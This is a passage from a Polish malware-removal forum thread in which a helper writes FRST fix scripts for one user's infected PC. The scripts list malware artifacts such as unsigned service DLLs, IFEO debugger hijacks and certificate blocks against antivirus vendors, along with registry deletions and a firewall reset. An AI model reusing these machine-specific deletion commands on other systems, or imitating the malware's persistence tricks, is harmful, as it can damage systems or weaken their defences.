R2 BIT; C:\ProgramData\BIT\BIT.dll [1812992 2017-05-17] (TODO: ) [brak podpisu cyfrowego] S2 CSHMDR; C:\Users\And\AppData\Local\CSHMDR\Snare.dll [900096 2017-05-22] (IntertSect Alliance Pty Ltd) [brak podpisu cyfrowego] S2 CWASRE; C:\Users\And\AppData\Local\CWASRE\Snare.dll [830464 2017-05-15] (InterSect Alliance Pty Ltd) [brak podpisu cyfrowego] R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [101016 2017-05-17] () S2 NPASRE; C:\Users\And\AppData\Local\NPASRE\Snare.dll [830464 2017-05-12] (InterSect Alliance Pty Ltd) [brak podpisu cyfrowego] S2 snare; C:\Users\And\AppData\Local\snare\Snare.dll [898048 2017-05-25] (IntertSect Alliance Pty Ltd) [brak podpisu cyfrowego] S2 terana; C:\Users\And\AppData\Local\terana\terana.dll [909312 2017-05-31] (IntertSect Alliance Pty Ltd) [brak podpisu cyfrowego] R2 WinAppSvr; C:\ProgramData\Microsoft\AppV\sym\dbg.dll [109056 2017-05-12] (TODO: ) [brak podpisu cyfrowego] R2 WinSAPSvc; C:\Users\And\AppData\Roaming\WinSAPSvc\WinSAP.dll [1887232 2017-05-17] () [brak podpisu cyfrowego] C:\ProgramData\BIT
C:\Users\And\AppData\Local\CSHMDR
C:\Users\And\AppData\Local\CWASRE
C:\Users\And\AppData\Local\NPASRE
C:\Users\And\AppData\Local\snare
C:\Users\And\AppData\Local\terana
C:\ProgramData\Microsoft\AppV\sym\dbg.dll
C:\Users\And\AppData\Roaming\WinSAPSvc
2017-05-24 11:08 - 2017-05-31 13:27 - 00001987 _____ C:\Users\And\Desktop\big_bang_empire.lnk
2017-05-24 11:08 - 2017-05-31 13:27 - 00001961 _____ C:\Users\And\Desktop\BigFarm.lnk
2017-05-09 12:16 - 2017-05-09 12:16 - 0016176 _____ () C:\Users\And\AppData\Local\InstallationConfiguration.xml
2017-05-09 12:16 - 2017-05-09 12:16 - 0140800 _____ () C:\Users\And\AppData\Local\installer.dat
2017-05-09 12:17 - 2017-05-09 12:17 - 0278509 _____ () C:\Users\And\AppData\Local\Ranrantouch.bin
C:\Windows\Temp\gBAC6.tmp.exe
C:\Users\And\zijkxhq.exe
DeleteKey: HKCU\Software\Hotleaf
DeleteKey: HKLM\SOFTWARE\WOW6432Node\Hotleaf
DeleteKey: HKCU\Software\Firefox
DeleteKey: HKLM\SOFTWARE\WOW6432Node\Firefox
DeleteKey: HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main
DeleteKey: HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main
DeleteKey: HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main
DeleteKey: HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes
DeleteKey: HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes
DeleteKey: HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes
CMD: dir /a "C:\Program Files"
CMD: dir /a "C:\Program Files (x86)"
CMD: dir /a "C:\Program Files\Common Files\System"
CMD: dir /a "C:\Program Files (x86)\Common Files\System"
CMD: dir /a C:\ProgramData
CMD: dir /a C:\Users\And\AppData\Local
CMD: dir /a C:\Users\And\AppData\LocalLow
CMD: dir /a C:\Users\And\AppData\Roaming
CMD: netsh advfirewall reset
Hosts:
EmptyTemp:


Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

 
Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. Przedstaw go.
 
3. Kompleksowo wymień profile w przeglądarce Google Chrome oraz Mozilla FireFox.
  • Otwórz Google Chrome następnie: Ustawienia > karta Ustawienia > Osoby > Dodaj Osobę > Załóż czysty profil > ponownie wejdź do sekcji Osoby i skasuj wszystkie stare profile.
  • Kliknij klawisz z flagą Windows + R > wklej komendę "C:\Program files (x86)\Mozilla Firefox\firefox.exe" -p lub "C:\Program Files\Mozilla Firefox\firefox.exe" -p > załóż nowy profil, wszystkie poprzednie skasuj. 

Utracisz wszystko z tych przeglądarek, więc ewentualnie możesz wyeksportować zakładki i ważne linki.
Ważne, abyś którąś z powyższych przeglądarek ustawił jako domyślną - inaczej nie cofnie się modyfikacja infekcji.
 
4. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry).
 

hotleaf;firefox

 
Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum.
 
5. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

Odnośnik do komentarza

FireFox wcale nie został usunięty, tylko Ci się tak wydaję, bo dotychczasowo przez infekcję systemu korzystałeś z podróbki. Oryginalna wersja była usilnie zamaskowana przez adware. Deinstalacja nie rusza profili, więc musisz powtórzyć działanie z profilem ponownie (patrz pkt. 2 w tym poście).
 
Reszta pomyślnie wykonana, teraz musimy dobić i pominięte przeze mnie elementy za pierwszym razem. Niektóre elementy usuną się ponownie, bo wcześniej popełniłeś literówkę i nie wykonało się to tj. powinno.
 
1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść:
 

CloseProcesses:
CreateRestorePoint:
HKLM\...\RunOnce: [AND-KOMPUTER] => C:\Windows\TEMP\gC36D.tmp.exe [239104 2017-06-19] () HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions) HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (FRISK Software International/F-Prot) HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Bitdefender SRL) HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (G DATA Software AG) HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Symantec Corporation) HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Webroot Inc.) HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab) HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools) HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.) HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Emsisoft Ltd) HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.) HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (K7 Computing Pvt Ltd) HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee) HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (McAfee) HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.) HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (ThreatTrack Security) HKLM\ DisallowedCertificates: 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 (CURIOLAB S.M.B.A.) HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG) HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (BullGuard Ltd) HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ) HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation) HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Malwarebytes Corporation) HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Trend Micro) HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security) HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Total Defense, Inc.) HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL) HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L) HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) S1 iSafeKrnlMon; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [X] R2 swpvr; C:\ProgramData\Microsoft\Software\Shadow\Provider.dll [122880 2017-05-17] (TODO: ) [brak podpisu cyfrowego]
C:\ProgramData\Microsoft\Software
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
MSCONFIG\startupfolder: C:^Users^And^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^x.vbs => C:\Windows\pss\x.vbs.Startup
MSCONFIG\startupfolder: C:^Users^And^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^z.vbs => C:\Windows\pss\z.vbs.Startup
2017-06-01 09:12 - 2017-06-01 09:12 - 00000000 ____D C:\Users\Public\Documents\chrome
2017-06-19 11:39 - 2017-05-12 12:26 - 00000000 _____ C:\Users\Public\Documents\report.dat
2017-06-19 11:20 - 2017-05-12 12:26 - 00006566 _____ C:\Users\Public\Documents\temp.dat
2017-06-02 13:08 - 2017-05-17 10:48 - 00000000 ____D C:\Users\And\AppData\Roaming\WinSAPSvc
2017-05-24 11:08 - 2017-05-12 12:26 - 00000000 _____ C:\Windows\SysWOW64\1111
FF HKLM-x32\...\Firefox\Extensions: [{F003DA68-8256-4b37-A6C4-350FA04494DF}] - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt
FF HKLM-x32\...\Firefox\Extensions: [quickprint@hp.com] - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension
FF HKLM-x32\...\Firefox\Extensions: [arthurj8283@gmail.com] - C:\Users\And\AppData\Roaming\Mozilla\Firefox\Profiles\e3mbqcik.default-1494836737585\extensions\arthurj8283@gmail.com
C:\Users\And\Desktop\Avira PC Cleaner.lnk
C:\Users\And\Desktop\Remove Avira PC Cleaner.lnk
DeleteKey: HKEY_USERS\S-1-5-21-1391594616-1957220202-1850595550-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\b8ade3e_0
DeleteValue: HKEY_USERS\S-1-5-21-1391594616-1957220202-1850595550-1000\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache|C:\Program Files (x86)\Firefox\Firefox.exe=Firefox
DeleteValue: HKEY_USERS\S-1-5-21-1391594616-1957220202-1850595550-1000\Software\Classes\FirefoxURL\shell\open\command|C:\Program Files (x86)\Firefox\Firefox.exe -osint -url %1
DeleteValue: HKEY_USERS\S-1-5-21-1391594616-1957220202-1850595550-1000\Software\Classes\FirefoxURL\DefaultIcon|C:\Program Files (x86)\Firefox\Firefox.exe,1
DeleteValue: HKEY_USERS\S-1-5-21-1391594616-1957220202-1850595550-1000\Software\Mozilla\Firefox\OldDefaultBrowserCommand|C:\Program Files (x86)\Firefox\Firefox.exe -osint -url %1
DeleteValue: HKEY_USERS\S-1-5-21-1391594616-1957220202-1850595550-1000\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Persisted|C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe=1
DeleteKey: HKEY_USERS\S-1-5-21-1391594616-1957220202-1850595550-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\651b31f_0
DeleteValue: HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Firefox\InstallInfo|ShowIconsCommand=C:\Program Files (x86)\Firefox\Firefox.exe -ShowIconsCommand
DeleteValue: HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Firefox\InstallInfo|ReinstallCommand=C:\Program Files (x86)\Firefox\Firefox.exe -ReinstallCommand
DeleteValue: HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Firefox\InstallInfo|HideIconsCommand=C:\Program Files (x86)\Firefox\Firefox.exe -HideIconsCommand
DeleteValue: HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Firefox\DefaultIcon|C:\Program Files (x86)\Firefox\Firefox.exe,0
DeleteValue: HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Firefox\Capabilities|ApplicationIcon=C:\Program Files (x86)\Firefox\Firefox.exe,0
EmptyTemp:

 
Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

 
Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. Przedstaw go.

2. Kliknij klawisz z flagą Windows + R > wklej komendę "C:\Program files (x86)\Mozilla Firefox\firefox.exe" -p lub "C:\Program Files\Mozilla Firefox\firefox.exe" -p > załóż nowy profil, wszystkie poprzednie skasuj. 

3. Usunąłem diagnostykę, bo picasso właśnie zawiadomiła mi, że inny user podesłał jej plik.

W związku z przeprowadzeniem analizy wirusa przez picasso, zalecana jest kompleksowa reinstalacja przeglądarki, by usuną tą modyfikację.

  • Upewnij się, że nie masz włączonej synchronizacji, która załaduje złe ustawienia z serwera po reinstalacji przeglądarki: KLIK.
  • Jeśli potrzebne, wyeksportuj zakładki: CTRL+SHIFT+O > Organizuj > Eksportuj zakładki do pliku HTML.
  • Odinstaluj Google Chrome. Przy deinstalacji zaznacz Usuń także dane przeglądarki.
  • Zainstaluj najnowszą stabilną wersję Google Chrome: KLIK.

4. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

Edytowane przez Rucek
Odnośnik do komentarza
  • 2 tygodnie później...

Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto

Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.

Zarejestruj nowe konto

Załóż nowe konto. To bardzo proste!

Zarejestruj się

Zaloguj się

Posiadasz już konto? Zaloguj się poniżej.

Zaloguj się
  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...